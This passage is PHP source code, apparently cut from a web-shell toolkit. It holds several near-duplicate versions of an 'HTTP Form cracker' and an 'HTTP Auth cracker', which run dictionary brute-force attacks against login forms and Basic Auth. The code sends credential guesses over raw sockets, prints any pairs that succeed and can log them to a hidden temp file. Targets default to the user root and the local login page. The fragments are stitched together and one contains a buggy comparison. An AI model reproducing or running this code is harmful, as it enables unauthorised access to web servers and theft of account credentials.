fclose($dictionary); echo "Done!</font><br>"; } else { echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://" . getenv('HTTP_HOST') . "/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; } } if ($act == "basicauth") { global $errorbox, $et, $t, $crack, $hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) { $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } spliturL($_REQUEST['target'], $host, $page); $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ""; if ($method = 'GET') { $page .= $data; } $dictionary = fopen($_REQUEST['dictionary'], 'r'); echo "<font color=blue>"; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); }
function authcrackeR() { global $errorbox, $et, $t, $hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } spliturL($_REQUEST['target'], $host, $page); $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($method == 'GET') { $page .= $data; } $dictionary = fopen($_REQUEST['dictionary'], 'r'); echo '<font color=blue>'; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $so = fsockopen($host, 80, $en, $es, 5); if (!$so) { echo "{$errorbox} Can not connect to host{$et}"; break; } else { $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}"); if ($method == 'POST') { $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data); } $packet .= "\r\n\r\n"; $packet .= $data; fputs($so, $packet); $res = substr(fgets($so), 9, 2); fclose($so); if ($res == '20') { echo "U: {$user} P: {$pass}</br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } } } } echo 'Done!</font>'; } else { echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>"; } }
function authcrackeR() { global $errorbox, $et, $t, $crack, $hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) { $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } spliturL($_REQUEST['target'], $host, $page); $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ""; if ($method = 'GET') { $page .= $data; } $dictionary = fopen($_REQUEST['dictionary'], 'r'); echo "<font color=blue>"; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $so = fsockopen($host, 80, $en, $es, 5); if (!$so) { echo "{$errorbox} Can not connect to host{$et}"; break; } else { $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}"); if ($method == 'POST') { $packet .= "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen($data); } $packet .= "\r\n\r\n"; $packet .= $data; fputs($so, $packet); $res = substr(fgets($so), 9, 2); fclose($so); if ($res == '20') { echo "U: {$user} P: {$pass}</br>"; } flusheR(); } } echo "Done!</font>"; } else { echo "<center><form method=\"POST\" name=form>{$t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>{$hcwd}<input class=buttons type=submit value=Start></td></tr></form></table></center>"; } }